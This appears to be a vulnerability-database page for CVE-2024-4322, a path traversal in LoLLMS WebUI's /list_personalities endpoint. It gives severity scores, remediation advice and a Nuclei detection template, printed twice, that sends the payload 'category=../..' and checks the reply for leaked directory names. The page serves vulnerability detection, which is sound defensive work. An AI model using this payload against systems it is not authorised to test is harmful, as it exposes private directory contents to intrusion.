LoLLMS WebUI < 9.8 - Path Traversal

CVE-2024-4322

Verified

Description

parisneo/lollms-webui contains a path traversal caused by improper handling of 'category' parameter in /list_personalities endpoint, letting attackers list arbitrary directories, exploit requires control over 'category' parameter.

Severity

High

CVSS Score

7.5

Exploit Probability

45%

Published Date

May 10, 2026

Template Author

mj-bin

CVE-2024-4322.yaml

id: CVE-2024-4322

info:
  name: LoLLMS WebUI < 9.8 - Path Traversal
  author: MJ-bin
  severity: high
  description: |
   parisneo/lollms-webui contains a path traversal caused by improper handling of 'category' parameter in /list_personalities endpoint, letting attackers list arbitrary directories, exploit requires control over 'category' parameter.
  impact: |
   Attackers can list all directories on the system, leading to potential information disclosure and further exploitation.
  remediation: |
   Implement proper input validation and sanitization for the 'category' parameter; update to the latest version with security patches.
  reference:
    - https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4322
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4322
    cwe-id: CWE-29
    epss-score: 0.45155
    epss-percentile: 0.97688
    cpe: cpe:2.3:a:lollms:lollms_web_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="LoLLMS WebUI - Welcome"
  tags: cve,cve2024,lollms-webui,lollms,traversal,ai

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LoLLMS WebUI - Welcome")'
        internal: true
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/list_personalities?category=../.."

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"lollms_core\"", "\"personal_data\"")'
        condition: and
# digest: 4a0a0047304502207dc799d8f5ab42eeb466ed0179e84bb7a3ec25707682124b1f3453b5f9532ba1022100bec613a964104b2573d98ba63b5fcf50645f1d0742de2ba1120c11c94c11a46a:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2024-4322

CWE ID:

cwe-29

References

https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209 https://nvd.nist.gov/vuln/detail/CVE-2024-4322

Remediation Steps

Implement proper input validation and sanitization for the 'category' parameter; update to the latest version with security patches.

id: CVE-2024-4322

info:
  name: LoLLMS WebUI < 9.8 - Path Traversal
  author: MJ-bin
  severity: high
  description: |
   parisneo/lollms-webui contains a path traversal caused by improper handling of 'category' parameter in /list_personalities endpoint, letting attackers list arbitrary directories, exploit requires control over 'category' parameter.
  impact: |
   Attackers can list all directories on the system, leading to potential information disclosure and further exploitation.
  remediation: |
   Implement proper input validation and sanitization for the 'category' parameter; update to the latest version with security patches.
  reference:
    - https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4322
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4322
    cwe-id: CWE-29
    epss-score: 0.45155
    epss-percentile: 0.97688
    cpe: cpe:2.3:a:lollms:lollms_web_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="LoLLMS WebUI - Welcome"
  tags: cve,cve2024,lollms-webui,lollms,traversal,ai

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LoLLMS WebUI - Welcome")'
        internal: true
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/list_personalities?category=../.."

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"lollms_core\"", "\"personal_data\"")'
        condition: and
# digest: 4a0a0047304502207dc799d8f5ab42eeb466ed0179e84bb7a3ec25707682124b1f3453b5f9532ba1022100bec613a964104b2573d98ba63b5fcf50645f1d0742de2ba1120c11c94c11a46a:922c64590222798bb761d5b6d8e72950

LoLLMS WebUI < 9.8 - Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LoLLMS WebUI < 9.8 - Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps